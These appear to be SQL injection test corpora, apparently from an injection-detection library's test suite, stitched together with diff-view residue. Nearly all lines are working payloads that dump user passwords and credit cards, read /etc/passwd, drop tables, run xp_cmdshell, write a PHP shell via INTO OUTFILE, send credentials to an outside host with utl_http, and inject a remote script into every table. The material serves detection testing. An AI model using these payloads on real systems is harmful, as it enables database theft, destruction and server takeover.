true is not unknown for update union select table_name from information_schema.tables
1 for update union select 1
# ht/ TK
(true)-(true)union select table_name from information_schema.tables
(@a)-(@a)union select table_name from information_schema.tables
# ht/ @stamparm
1 OR (1 OR 1)--
(1) OR (1 OR 1)--
((1) OR (1 OR 1))--
((1) OR ((1 OR 1)))--
1 OR ((1 OR 1)) --
1 OR ((1) OR 1) --
# ht/ @stamparm
(@x OR @y) UNION ALL SELECT name,email,password FROM users--
(@x OR (@y)) UNION ALL SELECT name,email,password FROM users--
((@x) OR @y) UNION ALL SELECT name,email,password FROM users--
(@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
@x) OR (@y) UNION ALL SELECT name,email,password FROM users--
@x OR (@y) UNION ALL SELECT name,email,password FROM users--
# ht/ @stamparm
(SELECT 1 FROM DUAL)
(SELECT @a FROM DUAL) UNION ALL SELECT 1, 2, 3--
(SELECT (1) FROM DUAL)
(select @version from dual)
(select (@version - 1) from dual)
(select ('foo' - 1) from dual)
(select 'foo' from dual)
(select 1 foobar from dual)
# previously had problems with operators made from two words
# ht/@stamparm
1 and 1 not between 0 and 1
1 AND 1 SOUNDS LIKE 1
1 AND 1 NOT LIKE 0
(1 AND 1) OR 2>1--
# ht/@FluxReiners
'-(1 or 1) and 1=0 union select load_file('/etc/passwd'),credit_card,password from users-- -
'-(-1 or -1) and 1=0 union
'-(-(1) or -1) and 1=0 union
'-((1) or -1) and 1=0 union
# https://twitter.com/dsrbr/status/342132003270959104
-1 union select null, listagg(login || ':' || pass,', ') within group (order by login) from users;
-1 union select null, xmlagg(xmlelement("user",login || ':' || pass).getStringVal() from users;
-1 union select null, stragg(login || ':' || pass ||', ') from users;
-1 union select listagg(login || ':' || pass,', ') within group (order by login) from users;
#ht ivan
users.id%0D%0A%23asd%0D%0Aunion%0D%0A%23asd%0D%0Aselect%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aaa+%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Afrom%0D%0A%23asd%0D%0A--a-%0D%0A%23aaa%0D%0Aasdasd
# http://samincube.blogspot.ru/2013/06/time-based-sqli-on-google-coupon.html
1'=sleep(1)='1
# https://twitter.com/dsrbr/status/343017094926962691
1 and select (utl_http.request('http://client9.com/') || select listagg(login || chr(58) || pass || ', ') within group (order by login) from dual) is not null;
# https://twitter.com/dsrbr/status/341228356936814592
-1 union select top 1 null, lead(pass, 0) over (order by pass) from users;
# https://twitter.com/dsrbr/status/340018970054766592
-1 union select null, array_to_json(array_agg(users))::text from users limit 1;
1 and (select array_to_json(array_agg(users))::text::bool from users limit 1;
# http://www.exploit-db.com/exploits/25915/
' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e,null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE 'afile.php'
# http://blog.detectify.com/post/51651525114/the-ultimate-sql-injection-payload
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
# misc secondary sql statements
1 and true; BEGIN DECLARE @xy varchar(8000)
1; BEGIN DECLARE @xy varchar(8000)
x' and 1 = 0; BEGIN DECLARE
x' AND 1=0; DROP TABLE TMP_DB;
' AND 1=0; DECLARE @S VARCHAR(4000) SET @S
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE
# https://twitter.com/st1ll_di3/status/344416764949561346
# http://pastebin.com/Ymcs7nE0
(--- 0)'=(currenT_user()-3) union select 1,2,3 from users; -- -
# example from http://www.websec.ca/kb/sql_injection
1=1 AND-+-+-+-+~~((1))
# the bizarre sp_password hackery
1-- foo sp_password
1'--sp_password
# nice ms-access, courtesy mod-security
foo' Eqv StrComp(username, 0x12+0x34+0xab+0xcd,0) Imp 'a
# mysql and pgsql string litterals
b'1' UNION SELECT 1
x'1' UNION SELECT 1
n'1' UNION SELECT 1
# ending clauses
1 having 1 limit 1 union select 1--
1 having (1) limit 1 union select 1--
1 having -(1) limit 1 union select 1--
1 having sin(1) limit 1 union select 1--
1 having 1 limit 2 group by 3 union select 1--
1 group by 2 union select 1 --
sin(1) group by 1 union select 1--
@version group by 1 union select 1--
@version group by (-1) union select 1--
(@version) group by -1 union select 1--
(@version) group by (-1) union select 1--
(@version)) group by (-1) union select 1--
(1)) group by (-1) union select 1--
(@version) group by sin(-1) union select 1--
1 group by sin(1) union select 1--
1 group by 1 - sin(1) union select 1--
1 group by (sin(1)) union select 1--
-1 group by -(-sin(1)) union select 1--
sin(1) group by (-sin(1)) union select 1--
sin(1)-1 group by (-sin(1)) union select 1--
sin(1)-1 group by 1 union select 1--
1 group by ((1)) union select 1--
1 group by (((1))) union select 1--
((1)) group by (1) union select 1--
(1) group by ((1)) union select 1--
(1) group by (1) union select 1--
# more with 'having'
-(1) is not unknown having 1 order by 1 limit 1 for update UNION select table_name from information_schema.tables limit 1
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
-(1) is not unknown for update UNION select table_name from information_schema.tables limit 1
-(1) is not unknown having 1 order by 1 limit 1 UNION select table_name from information_schema.tables limit 1
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
-(1) is not unknown UNION select table_name from information_schema.tables limit 1
-(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1
-(1) is unknown having 1 UNION select table_name from information_schema.tables limit 1
-(1) for update UNION select table_name from information_schema.tables limit 1
1 for update UNION select table_name from information_schema.tables limit 1
-(1) for update UNION select table_name from information_schema.tables limit 1
-(true) for update UNION select table_name from information_schema.tables limit 1
-(null) for update UNION select table_name from information_schema.tables limit 1
-(\N) for update UNION select table_name from information_schema.tables limit 1
-(\N) for update having true UNION select table_name from information_schema.tables limit 1
-(\N) for update having 1 UNION select table_name from information_schema.tables limit 1
-(1) for update having 1 UNION select table_name from information_schema.tables limit 1
-(1) having 1 for updateUNION select table_name from information_schema.tables limit 1
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
-(1) having 1 for update UNION select table_name from information_schema.tables limit 1
\''; DROP TABLE users; --
\''); DROP TABLE users; --
\''; /* one */ ;DROP TABLE users; --
\''; select 1; drop table users; --
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
1; EXECUTE AS LOGIN 'root'; GO xp_cmdshell 'whoami.exe' ; REVERT ;
1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
1); USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck
EXEC sp_add_job @job_name = 'TestJob';
EXECUTE sp_add_job @job_name = 'TestJob';
1;EXECUTE sp_add_job @job_name = 'TestJob';
1;print 'foo'; exec xp_cmdshell 'destroy';
# nested sub-selects
-1 - (select (1 - select (select 1))) union all select 2 --
-1 - (select 1) - union all select 2 --
(select 1) - 1 union all select 2 --
((select 1) - 1) + (select 1) union all select 2 --
(select (select (select 1))) union all select 2 --
(select (select (select 1))) union all select 2 --
(select ((select (select 1))) union all select 2 --
(select (select ((select 1))) union all select 2 --
(select ((select 1 - (select 1))) union all select 2 --
(select (select (((select 1))) union all select 2 --
(select ((select (select 1))) union all select 2 --
(select (((select (select 1))) union all select 2 --
(select (select (1 - select 1))) union all select 2 --
(select (select 1 - (select 1))) union all select 2 --
(select 1 - (select 1 - (select 1))) union all select 2 --
# moar unions
-1 union distinct select table_name from information_schema.tables
-1 union distinct all select table_name from information_schema.tables
-1 union all distinct select table_name from information_schema.tables
-1 union all select table_name from information_schema.tables
# more
if(1, -1, 2) union select table_name from information_schema.tables limit 1
if((1), -1, 2) union select table_name from information_schema.tables limit 1
if(1=2, -1, 2) union select table_name from information_schema.tables limit 1
true in(2, (select 2)) union select table_name from information_schema.tables limit 1
true in(2, 1) union select table_name from information_schema.tables limit 1
#
-1 union select current_user``union select table_name from information_schema.tables
if(1, 1, 2) union select 3
if(sin(1), 1, 2) union select 3
if(1, sin(1), 2) union select 3
if(1 - sin(1), 2) union select 3
if((1), 1, 2) union select 3
if(-(1), 1, 2) union select 3
#
1; if exists ( /* anything */
# these aren't SQL but close enough
union (select 1)--
union all (select 1)--
union all (select distinct 1)--
union (select 1,2,3,4,5)--
union (select -1,2,3,4,5)--
union (select -(1),2,3,4,5)--
union (select -sin(1),2,3,4,5)--
1;call p(@version, @a)
1;load data infile "foo"
1;load xml infile "foo"
1;load xml local infile "foo"
1;load xml low_priority infile "foo"
1;load xml concurrent infile "foo"
1; delete from foo
1; delete low_priority from foo
1; delete quick from foo
1; delete ignore from foo
1;do (1=1)
-0b01 for update union select table_name from information_schema.tables limit 1
binary _latin1 'true' COLLATE latin1_german2_ci is not unknown union select table_name from information_schema.tables
binary true COLLATE latin1_german2_ci union select table_name from information_schema.tables
1<binary 1>2 union select table_name from information_schema.tables limit 1
binary 1 < binary 2 > binary 3 union select table_name from information_schema.tables limit 1
binary (false) union select table_name from information_schema.tables limit 1
1 - binary (false) union select table_name from information_schema.tables limit 1
1 - (binary (false)) union select table_name from information_schema.tables limit 1
binary binary 1 union select table_name from information_schema.tables
binary -1 union select table_name from information_schema.tables
binary -(1) union select table_name from information_schema.tables
binary (binary 1) union select table_name from information_schema.tables
binary (binary 1) union select table_name from information_schema.tables
# werid slash escaping in Older T-SQL databases
# http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR
\1=\1AND\1=\1;
# more weird T-SQL weirdness
\%250=\-1AND\*1=\/1
# mysql
-1 procedure analyse() union select table_name from information_schema.tables limit 1
# HT @FluxReiners
(1)mod @a or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
@a mod (1) or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- -
# HT @LightOS
# issue here is how '1gfsdg..' is processed.
# MySQL parses it as a single word, other databases treat it as "1", "gfs..."
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1
# HT @FluxReiners
(select 1 foo) union select load_file('foo');
#
# Anonymous from Research Institution of Telecom in Beijing, China
# commenting out since i have no idea how this could be a true SQL injection
#=1 union select admin,pass from admin limit 1
#=1 union select 1,2,3,4,5,6
# problems with type-casting, and nested type casting
#
# credit: Reto Ischi
#
's' || binary(1)# and n='foo"
1 - binary (1 - binary(1)) UNION SELECT 2 --
1 - binary (binary(1) -1) UNION SELECT 2 --
binary (1 - binary(1)) UNION SELECT 2 --
binary (binary(1) - 1) UNION SELECT 2 --
binary (binary(1)) UNION SELECT 2 --
#
# Padding using between operator
#
(1 between @version and "2") & 1 UNION SELECT 1
(1 between @version and @user) & 1 UNION SELECT 1
(1 between 1 and @version) & 1 UNION SELECT 1
(1 between '1' and @version) & 1 UNION SELECT 1
(1 between 1 and 2) & 1 UNION SELECT 1
(1 between '1' and '2') & 1 UNION SELECT 1
(1 between 1 and '2') & 1 UNION SELECT 1
(1 between '1' and 2) & 1 UNION SELECT 1
('1' between '1' and '2') & 1 UNION SELECT 1
(@version between '1' and '2') & 1 UNION SELECT 1
(@version between 1 and '2') & 1 UNION SELECT 1
#
# ANY and SOME subqueries
#
1 - ANY(SELECT 1,2)
ANY(SELECT 1) - 1 UNION ALL --
ANY(SELECT (1)) - 1 UNION ALL --
ANY((SELECT 1)) - 1 UNION ALL --
1 - ANY(SELECT 1) UNION ALL --
#
# embedded %A0 mysql
#
1%A0UNION%A0SELECT%A02--
1%00UNION%00SELECT%002--
#
# http://www.exploit-db.com/exploits/28854/
#
stringindatasetchoosen%25' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%25dministrator' and rownum<=1 and PASSWORD like '0%25') and '1%25'='1
#
# Thanks to @rsalgado
# A degenerate MySQL ODBC case
#
-{``.``.id} union select table_name FROM information_schema.tables LIMIT 1

View file

@ -0,0 +1,132 @@
# mysql implicit conversions tests
A' AND 'B
A 'AND' B
'AND'
' AND '
A' && 'B
A '&&' B
'&&'
' && '
A' = 'B
A '=' B
'='
' = '
A' & 'B
A '&' B
'&'
' & '
A' | 'B
A '|' B
'|'
' | '
A' ^ 'B
A '^' B
'^'
' ^ '
A' DIV 'B
A 'DIV' B
'DIV'
' DIV '
A' / 'B
A '/' B
'/'
' / '
A' <=> 'B
A '<=>' B
'<=>'
' <=> '
A' >= 'B
A '>=' B
'>='
' >= '
A' > 'B
A '>' B
'>'
' > '
A' << 'B
A '<<' B
'<<'
' << '
A' <= 'B
A '<=' B
'<='
' <= '
A' < 'B
A '<' B
'<'
' < '
A' LIKE 'B
# common false positive
#A 'LIKE' B
#'LIKE'
#' LIKE '
A' - 'B
A '-' B
'-'
' - '
A' %25 'B
A '%25' B
'%25'
' %25 '
A' MOD 'B
A 'MOD' B
'MOD'
' MOD '
A' != 'B
A '!=' B
'!='
' != '
A' <> 'B
A '<>' B
'<>'
' <> '
A' NOT LIKE 'B
A 'NOT LIKE' B
'NOT LIKE'
' NOT LIKE '
A' NOT REGEXP 'B
A 'NOT REGEXP' B
'NOT REGEXP'
' NOT REGEXP '
A' OR 'B
A 'OR' B
'OR'
' OR '
A' || 'B
A '||' B
'||'
' || '
A' %2B 'B
A '%2B' B
'%2B'
' %2B '
A' REGEXP 'B
A 'REGEXP' B
'REGEXP'
' REGEXP '
A' >> 'B
A '>>' B
'>>'
' >> '
A' RLIKE 'B
A 'RLIKE' B
'RLIKE'
' RLIKE '
A' NOT RLIKE 'B
A 'NOT RLIKE' B
'NOT RLIKE'
' NOT RLIKE '
A' SOUNDS LIKE 'B
A 'SOUNDS LIKE' B
'SOUNDS LIKE'
' SOUNDS LIKE '
A' * 'B
A '*' B
'*'
' * '
A' XOR 'B
A 'XOR' B
'XOR'
' XOR '

View file

@ -0,0 +1,275 @@
#
# Various samples from PHPIDS
#
%22+OR+1%3D1%23
%3B+DROP+table+Users+--
admin%27--
SELECT+%2F%2A%2132302+1%2F0%2C+%2A%2F+1+FROM+tablename
10%3BDROP+members+--
SELECT+CHAR%280x66%29
SELECT+LOAD_FILE%280x633A5C626F6F742E696E69%29
EXEC%28%40stored_proc+%40param%29
chr%2811%29%7C%7Cchr%2812%29%7C%7Cchar%2813%29
1+or+name+like+%27%25%27
1+OR+%271%27%21%3D0
1+OR+ASCII%282%29+%3D+ASCII%282%29
1%27+OR+1%26%221
1%27+OR+%271%27+XOR+%270
1+OR%2B1%3D1
1+OR%2B%281%29%3D%281%29
aaa%27+or+%281%29%3D%281%29+%23%21asd
aaa%27+OR+%281%29+IS+NOT+NULL+%23%21asd
a%27+or+1%3D%271
asd%27+union+%28select+username%2Cpassword+from+admins%29+where+id%3D%271
1%27%3B+WAITFOR+TIME+%2717%3A48%3A00+%27+shutdown+--+-a
1%27%3B+anything%3A+goto+anything+--+-a
%27+%3D%2B+%27
asd%27+%3D-+%28-%27asd%27%29+--+-a
aa%22in%2B+%28%22aa%22%29+or+-1+%21%3D+%220
aa%22+%3D%2B+-+%220++
aa%27+LIKE+0+--+-a
aa%27+LIKE+md5%281%29+or+%271
aa%27+REGEXP-+md5%281%29+or+%271
aa%27+DIV%401+%3D+0+or+%271
aa%27+XOR-+column+%21%3D+-%270
union+select+password+from+users+where+1
str%27%3Dversion%28%29%0A%09%09%09%09%09%09UNION%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09SELECT+group_concat%28table_name%29%23%0A%09%09%09%09%09%09%23%23%0A%09%09%09%09%09%09%2F%2A%21FROM%2A%2F+information_schema.tables+WHERE+%271
asd%22or-1%3D%22-1
asd%22or%211%3D%22%211
asd%22or%21%281%29%3D%221
asd%22or%401%3D%22%401
asd%22or-1+XOR%220
asd%22+or+ascii%281%29%3D%2249
asd%22+or+md5%281%29%5E%221
asd%22+or+table.column%5E%221
asd%22+or+%40%40version%5E%220
asd%22+or+%40%40global.hot_cache.key_buffer_size%5E%221
1%22OR%21%22a
1%22OR%21%220
1%22OR-%221
1%22OR%40%221%22+IS+NULL+%231+%21+%28with+unfiltered+comment+by+tx+%3B%29
1%22OR%21%28false%29+%231+%21
1%22OR-%28true%29+%23a+%21
1%22+INTO+OUTFILE+%22C%3A%2Fwebserver%2Fwww%2Freadme.php
asd%27+or+md5%285%29%5E%271+
asd%27+or+column%5E%27-1+
asd%27+or+true+--+a
%5C%22asd%22+or+1%3D%221
a+1%27+or+if%28-1%3D-1%2Ctrue%2Cfalse%29%23%21
aa%5C%5C%22aaa%27+or+%271
%27+or+id%3D+1+having+1+%231+%21
%27+or+id%3D+2-1+having+1+%231+%21
aa%27or+null+is+null+%23%28
aa%27or+current_user%21%3D%27+1
aa%27or+BINARY+1%3D+%271
aa%27or+LOCALTIME%21%3D%270
aa%27like-%27aa
aa%27is%5CN%7C%21%27
%27is%5CN-%21%27
asd%27%7Ccolumn%26%26%271
asd%27%7Ccolumn%21%3D%27
aa%27or+column%3Dcolumn+--+%23aa
aa%27or+column%2Acolumn%21%3D%270
aa%27or+column+like+column+--+%23a
0%27%2Acolumn+is+%5CN+-+%271
1%27%2Acolumn+is+%5CN+or+%271
1%27%2A%40a+is+%5CN+-+%27
1%27%2A%40a+is+%5CN+or+%271
1%27+-1+or%2B1%3D+%27%2B1+
1%27+-1+-+column+or+%271+
1%27+-1+or+%271
+%281%29or%281%29%3D%281%29+
fo%22o%27or%271
%27+OR+UserID+IS+NOT+2
%27+OR+UserID+IS+NOT+NULL
%27+OR+UserID+%3E+1
%27++OR+UserID+RLIKE++%27.%2B%27+
%27OR+UserID+%3C%3E+2
1%27+union+%28select+password+from+users%29+--+-a
1%27+union+%28select%271%27%2C%272%27%2Cpassword+from+users%29+--+-a
1%27+union+all+%28select%271%27%2Cpassword+from+users%29+--+-a
aa%27%21%3D%271
aa%27%21%3D%7E%271
aa%27%3D%28%27aa%27%29%23%28
aa%27%7C%2B%271
aa%27%7C%21%27aa
aa%27%5E%21%27aa+
abc%27+%3D+%21%21%270
abc%27+%3D+%21%21%21%21%270
abc%27+%3D+%21%21%21%21%21%21%21%21%21%21%21%21%21%21%270
abc%27+%3D+%210+%3D+%21%21%270
abc%27+%3D+%210+%21%3D+%21%21%21%270
abc%27+%3D+%21%2B0+%21%3D+%21%270+
aa%27%3D%2B%271
%27%3Bif+1%3D1+drop+database+test--+-a
%27%3Bif+1%3D1+drop+table+users--+-a
%27%3Bif+1%3D1+shutdown--+-a
%27%3B+while+1%3D1+shutdown--+-a
%27%3B+begin+shutdown+end--+-a+
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D+%211+div+1%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%211+div+1%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%21%40%40version+div+%40%40version%2B%27
%27%2BCOALESCE%28%27admin%27%29+and+1+%3D%2B1+%3D+%21true+div+%40%40version%2B%27
foo%27div+count%28select%60pass%60from%28users%29where+mid%28pass%2C1%2C1%29rlike+lower%28conv%2810%2Cpi%28%29%2Api%28%29%2Cpi%28%29%2Api%28%29%29%29+%29-%270
1-%23canvas%0A++++++++++++++++++++++++%28SELECT+1%2A1+from%28information_schema.tables%29+group+by+table_name+having+-+left%28hex%28table_name%29%2Ctrue%29+%3D+-7%29
str%23%27+UNION+SELECT+group_concat%28table_name%29%0A++++++++++++++++++++++++FROM%60information_schema%60.tables
aa%27in+%280%29%23%28
aa%27%21%3Dascii%281%29%23%28
%27+or+SOUNDEX+%281%29+%21%3D+%270
aa%27RLIKE+BINARY+0%23%28
aa%27or+column%21%3D%271
aa%27or+column+DIV+0+%3D0+%23
aa%27or+column%2B%281%29%3D%271
aa%27or+0%21%3D%270
aa%27LIKE%270
aa%27or+id+%3D%27%5C%27
1%27%3Bdeclare+%40%23+int%3Bshutdown%3Bset+%40%23+%3D+%271
1%27%3Bdeclare+%40%40+int%3Bshutdown%3Bset+%40%40+%3D+%271
asd%27+or+column%26%26%271
asd%27+or+column%3D+%211+and%2B1%3D%271
aa%27%21%3Dascii%281%29+or-1%3D-%271
a%27IS+NOT+NULL+or%2B1%3D%2B%271
aa%27in%28%27aa%27%29+or-1%21%3D%270
aa%27+or+column%3D%2B%211+%231
aa%27+SOUNDS+like%2B%271
aa%27+REGEXP%2B%270
aa%27+like%2B%270
-1%27%3D-%27%2B1
%27%3D%2B%27
aa%27+or+stringcolumn%3D+%2B%211+%231+
aa%27+or+anycolumn+%5E+-%271
aa%27+or+intcolumn+%26%26+%271
asd%27+or+column%26%26%271
asd%27+or+column%3D+%211+and%2B1%3D%271
aa%27+or+column%3D%2B%211+%231
aa%27IS+NOT+NULL+or%2B1%5E%2B%270
aa%27IS+NOT+NULL+or+%2B1-1+xor%270
aa%27IS+NOT+NULL+or%2B2-1-1-1+%21%3D%270
aa%27%7C1%2B1%3D%282%29Or%281%29%3D%271
aa%27%7C3%21%3D%274
aa%27%7Cascii%281%29%2B1%21%3D%271
aa%27%7CLOCALTIME%2A0%21%3D%271+
asd%27+%7C1+%21%3D+%281%29%23aa
%27+is+99999+%3D+%27
%27+is+0.00000000000+%3D+%27
1%27%2Acolumn-0-%270
1%27-%40a+or%271
a%27-%40a%3D%40a+or%271
aa%27+%2A%40var+or+1+SOUNDS+LIKE+%281%29%7C%271
aa%27+%2A%40var+or+1+RLIKE+%281%29%7C%271+
a%27+or%7Ecolumn+like+%7E1%7C%271
%27%3C%7E%27
a%27-1.and+%271
aa%27%2F1+DIV+1+or%2B1%3D%2B%271+
aa%27%260%2B1%3D%27aa
aa%27+like%280%29+%2B+1--+-a+
aa%27%5E0%2B0%3D%270
aa%27%5E0%2B0%2B1-1%3D%280%29--+-a
aa%27%3C3%2B1+or%2B1%3D%2B%271
aa%27%251%2B0%3D%270
%27%2F1%2F1%3D%27
+aa%27%2F1+or+%271
+aa1%27+%2A+%40a+or+%271+%27%2F1+regexp+%270
+%27+%2F+1+%2F+1+%3D%27
+%27%2F1%3D%27
+aa%27%260%2B1+%3D+%27aa
+aa%27%26%2B1%3D%27aa
+aa%27%26%281%29%3D%27aa
+aa%27%5E0%2B0+%3D+%270
+aa%27%5E0%2B0%2B1-1+%3D+%280%29--+-a
+aa%27%5E%2B-3+or%271
+aa%27%5E0%21%3D%271
+aa%27%5E%280%29%3D%270
+aa%27+%3C+%283%29+or+%271
+aa%27+%3C%3C3+or%271
+aa%27-%2B%211+or+%271
+aa%27-%211+like%270
+aa%27+%25+1+or+%271
+aa%27+%2F+%271%27+%3C+%273
+aa%27+%2F+%2B1+%3C+%273
+aa%27+-+%2B+%21+2+%21%3D+%2B+-+%271
+aa%27+-+%2B+%21+1+or+%271
+aa%27+%2F+%2B1+like+%270
+%27+%2F+%2B+%281%29+%2F+%2B+%281%29+%3D%27
+aa%27+%26+%2B%280%29-%281%29%3D%27aa
+aa%27+%5E%2B+-%280%29+%2B+-%280%29+%3D+%270
+aa%27+%5E+%2B+-+3+or+%271
+aa%27+%5E+%2B0%21%3D%271
+aa%27+%3C+%2B3+or+%271
+aa%27+%25+%2B1+or+%271
aa%27or+column%2A0+like%270
aa%27or+column%2A0%3D%270
aa%27or+current_date%2A0
1%27%2Fcolumn+is+not+null+-+%27+
1%27%2Acolumn+is+not+%5CN+-+%27+
1%27%5Ecolumn+is+not+null+-+%27+
aa%27+is+0+or+%271
%27+or+MATCH+username+AGAINST+%28%27%2Badmin+-a%27+IN+BOOLEAN+MODE%29%3B+--+-a
%27+or+MATCH+username+AGAINST+%28%27a%2A+-%29+-%2B+%27+IN+BOOLEAN+MODE%29%3B+--+-a
1%27%2A%40a+or+%271
1%27%2Anull+or+%271
1%27%2AUTC_TIME+or+%271
1%27%2Anull+is+null+-+%27
1%27%2A%40a+is+null+-+%27
1%27%2A%40%40version%2A-0%2520%3D%2520%270
1%27%2Acurrent_date+rlike%270
aa%27%2Fcurrent_date+in+%280%29+--+-a
aa%27+%2F+current_date+regexp+%270
aa%27+%2F+current_date+%21%3D+%271
1%27+or+current_date%2A-0+rlike%271
0%27+%2F+current_date+XOR+%271
%27or+not+false+%23aa
1%27+%2A+id+-+%270
1%27+%2Aid-%270
asd%27%3B+shutdown%3B+
asd%27%3B+select+null%2Cpassword%2Cnull+from+users%3B+
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b+where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user+OPEN+tablecursor+
aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b%0A++++++++++++++++++++++++where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user%0A++++++++++++++++++++++++OPEN+tablecursor+FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+WHILE%28%40a+%21%3D+null%29%0A++++++++++++++++++++++++%40query++%3D+null%2Bnull%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2Bnull%2B+%27+SET+id%3Dnull%2C%40b+%3D+%40payload%27%0A++++++++++++++++++++++++BEGIN+EXEC+sp_executesql+%40query%0A++++++++++++++++++++++++FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+END%0A++++++++++++++++++++++++CLOSE+tablecursor+DEALLOCATE+tablecursor%3B%0A++++++++++++++++++++++++and+some+text%2C+to+get+pass+the+centrifuge%3B+and+some+more+text.
%40query++%3D+null%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2B+%27+SET%5B++%27%2Bnull%2B%40b%2B+%27+%5D++%3D+%40payload%27
asd%27+union+distinct%28select+null%2Cpassword%2Cnull+from+users%29--a+
asd%27+union+distinct+%28+select+null%2Cpassword%2C%28null%29from+user+%29--+a+
# double encoded
## DECLARE%2520%40S%2520CHAR%284000%29%3BSET%2520%40S%3DCAST%280x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%2520AS%2520CHAR%284000%29%29%3BEXEC%28%40S%29%3B
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
## asaa%27%3BSELECT%5Basd%5DFROM%5Basd%5D
## asd%27%3B+select+%5Bcolumn%5D+from+users+
0x31+union+select+%40%40version%2Cusername%2Cpassword+from+users+
1+order+by+if%281%3C2+%2Cuname%2Cuid%29+
1+order+by+ifnull%28null%2Cuserid%29+
2%27+between+1+and+3+or+0x61+like+%27a
4%27+MOD+2+like+%270
-1%27+%2FID+having+1%3C+1+and+1+like+1%2F%271+
2%27+%2F+0x62+or+0+like+binary+%270
0%27+between+2-1+and+4-1+or+1+sounds+like+binary+%271+
-1%27+union+%28%28select+%28select+user%29%2C%28select+password%29%2C1%2F1+from+mysql.user%29%29+order+by+%271+
-1%27+or+substring%28null%2Fnull%2C1%2Fnull%2C1%29+or+%271
1%27+and+1+%3D+hex%28null-1+or+1%29+or+1+%2F%27null+
AND+CONNECTION_ID%28%29%3DCONNECTION_ID%28%29
AND+ISNULL%281%2F0%29
MID%28%40%40hostname%2C+1%2C+1%29
CHARSET%28CURRENT_USER%28%29%29
DATABASE%28%29+LIKE+SCHEMA%28%29
COERCIBILITY%28USER%28%29%29
1%27+and+0x1abc+like+0x88+or+%270
